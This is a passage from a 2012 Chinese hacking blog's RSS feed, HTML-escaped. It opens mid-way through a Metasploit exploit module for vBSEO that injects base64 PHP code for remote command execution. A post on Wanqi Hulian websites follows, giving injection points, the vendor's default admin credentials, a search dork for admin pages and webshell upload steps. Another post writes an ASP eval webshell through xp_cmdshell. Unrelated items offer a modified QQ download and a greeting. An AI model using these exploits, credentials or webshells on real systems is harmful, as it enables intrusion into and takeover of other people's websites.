sp;&nbsp;p&nbsp;=&nbsp;&quot;passthru(\&quot;%s\&quot;);&quot;&nbsp;%&nbsp;datastore[&#39;CMD&#39;]&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;p&nbsp;=&nbsp;Rex::Text.encode_base64(p)&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;p&nbsp;=&nbsp;Rex::Text.encode_base64(payload.encoded)&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;data&nbsp;=&nbsp;&quot;char_repl=&#39;{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}&#39;=&gt;&quot;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;=&nbsp;&#39;&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;datastore[&#39;URI&#39;]&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;&#39;/&#39;&nbsp;if&nbsp;uri[-1,1]&nbsp;!=&nbsp;&#39;/&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;&#39;vbseocp.php&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;response&nbsp;=&nbsp;send_request_cgi({&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;method&#39;&nbsp;=&gt;&nbsp;&#39;POST&#39;,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;uri&#39;&nbsp;=&gt;&nbsp;uri,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;data&#39;&nbsp;=&gt;&nbsp;data,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;headers&#39;&nbsp;=&gt;&nbsp;{&nbsp;&#39;Code&#39;&nbsp;=&gt;&nbsp;p&nbsp;}&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;})&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print_status(&quot;%s&quot;&nbsp;%&nbsp;response.body)&nbsp;if&nbsp;datastore[&#39;CMD&#39;]&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;end&nbsp;<br><br>end&nbsp;<br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1798</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2012-1-30 10:18:55</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1797"><title><![CDATA[万企互联网站程序通杀oday及修复方案]]></title><description><![CDATA[1、漏洞分析<br><br>漏洞存在页面：newsdisp.asp<br>很明显的注入漏洞！&nbsp;<br>有些站做了防注！（cookie注入就可以搞定了）]]></description><content:encoded><![CDATA[<p id=fp>1、漏洞分析<br><br>漏洞存在页面：newsdisp.asp<br>很明显的注入漏洞！&nbsp;<br>有些站做了防注！（cookie注入就可以搞定了）<br>一般的表名为admin&nbsp;字段名为：username&nbsp;password<br>有些站表为wq_admin&nbsp;字段同上&nbsp;<br>还有个更要命的漏洞（不过也不是什么漏洞）！&nbsp;<br>这些站基本都用了网络公司给他们的用户名跟密码！<br>用户名：xywanqi&nbsp;<br>密码：wanqi#029*（这个密码还得谢谢壞壞不乖兄弟破解）<br>都不要注入拿用户名跟md5密码了！&nbsp;<br><br>2、找后台（比较蛋疼的过程）<br><br>我试了几个常用的后台没找到。用阿d，明小子，豹子跑都没有跑出来！<br>我用谷歌搜&nbsp;&quot;技术支持：万企互联&quot;&nbsp;后台管理<br><br><br>谷歌第一个就找到了！<br>我发现他的后台很特别：<br>/wq029xxx/login.asp&nbsp;是这样的格式！<br>我试了几个站都是这种格局了<br><br>后台找到了！<br><br>3.拿shell<br><br>备份拿站！传个图片格式的小马！&nbsp;图片路径：/photo/20105112139512.jpg<br><br>有些站没有备份！&nbsp;<br>可以抓包上传，后台还有eweb编辑器可以利用！<br><br><br>这个没什么技术含量高手不要见笑！<br><br>提供修复方案：<br><br>防注入程序需能防cookie注入，及时修改密码，编辑器升级<br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1797</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2012-1-19 10:17:04</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1796"><title><![CDATA[QQ2011正式版(5064)绿色精简显IP版&纯净版]]></title><description><![CDATA[更新日志：<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>2012.01.12<br>更新QQ2011正式版(5064)]]></description><content:encoded><![CDATA[<p id=fp>更新日志：<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>2012.01.12<br>更新QQ2011正式版(5064)<br>更新CWUB2&nbsp;2012.01.10<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>2011.12.03<br>更新QQ2011正式版(3019)<br>更新CWUB2&nbsp;2011.12.02<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>2011.11.23<br>更新CWUB2&nbsp;111122<br>去掉了主面板的等级按钮（仍然可以通过我的资料卡片的等级进入等级页面）<br>修复了修改某项设置自动退出的问题<br>修复了不显示天气的问题<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>2011.11.17<br>更新QQ2011正式版(2522)<br>更新CWUB2&nbsp;111116<br>修复了上一版远程协助白屏的问题<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>2011.11.11<br>更新CWUB2&nbsp;111111<br>精简了一些文件<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>2011.10.28<br>更新QQ2011正式版(2432)<br>更新CWUB2<br>删除了一些无用图片<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>2011.10.14<br>修复某些情况下不能通过快捷方式打开的问题<br>修复其他一些小问题<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>2011.10.13<br>更新QQ2011正式版(2425)<br>更新CWUB2&nbsp;1.299<br>显IP版集成本地IP数据库<br>祝某人生日快乐<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br><br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>如果有任何问题请先看FAQ<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>恢复包中包含QQ音乐正在收听、快速登录、临时会话、迷你首页、通讯录以及所有组件的恢复<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>下载地址：<br><br>QQ2011正式版(5064)绿色精简显IP版&amp;纯净版<br>QQ2011正式版(5064)：<br>显IP版：<br><a href="http://file.jayxon.com/~jayxon/QQ2011JayXon.7z" target="_blank">http://file.jayxon.com/~jayxon/QQ2011JayXon.7z</a><br><a href="http://115.com/file/dno8gmm3" target="_blank">http://115.com/file/dno8gmm3</a><br>纯净版：<br><a href="http://115.com/file/cl01fchl" target="_blank">http://115.com/file/cl01fchl</a><br>恢复包：<br><a href="http://file.jayxon.com/~jayxon/QQ2011Files.7z" target="_blank">http://file.jayxon.com/~jayxon/QQ2011Files.7z</a><br><a href="http://115.com/file/aq5odts9" target="_blank">http://115.com/file/aq5odts9</a><br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1796</link><dc:subject>资源共享</dc:subject><dc:creator>kawen</dc:creator><dc:date>2012-1-16 9:43:55</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1795"><title><![CDATA[龙年大吉网站不定时更新]]></title><description><![CDATA[龙年大吉。祝全天下的人都能新年心想事成。呵呵。网站进入不定时更新阶段！]]></description><content:encoded><![CDATA[<p id=fp>龙年大吉。祝全天下的人都能新年心想事成。呵呵。网站进入不定时更新阶段！</p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1795</link><dc:subject>生活心情</dc:subject><dc:creator>kawen</dc:creator><dc:date>2012-1-11 9:46:17</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1794"><title><![CDATA[SA权限ECHO写一句话]]></title><description><![CDATA[注入点是SA权限.<br>xp_cmdshell是存在的.<br>找到网站主目录&nbsp;dir&nbsp;d:\wwwroot<br>找到站点的目录后.<br>Echo&nbsp;^&lt;%eval&nbsp;request(&quot;#&quot;)%&gt;^&nbsp;&gt;d:\wwwroot\xx\ok.asp]]></description><content:encoded><![CDATA[<p id=fp>注入点是SA权限.<br>xp_cmdshell是存在的.<br>找到网站主目录&nbsp;dir&nbsp;d:\wwwroot<br>找到站点的目录后.<br>Echo&nbsp;^&lt;%eval&nbsp;request(&quot;#&quot;)%&gt;^&nbsp;&gt;d:\wwwroot\xx\ok.asp<br>echo&nbsp;^&lt;%eval&nbsp;request(&quot;#&quot;)%^&gt;&nbsp;&gt;d:\wwwroot\xx\ok.asp<br>echo&nbsp;&quot;&lt;%eval&nbsp;request(&quot;#&quot;)%&gt;&quot;&nbsp;&gt;d:\wwwroot\xx\ok.asp<br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1794</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2012-1-11 9:41:07</dc:date></item>
</rdf:Seq>
</items>
</channel>
</rdf:RDF>
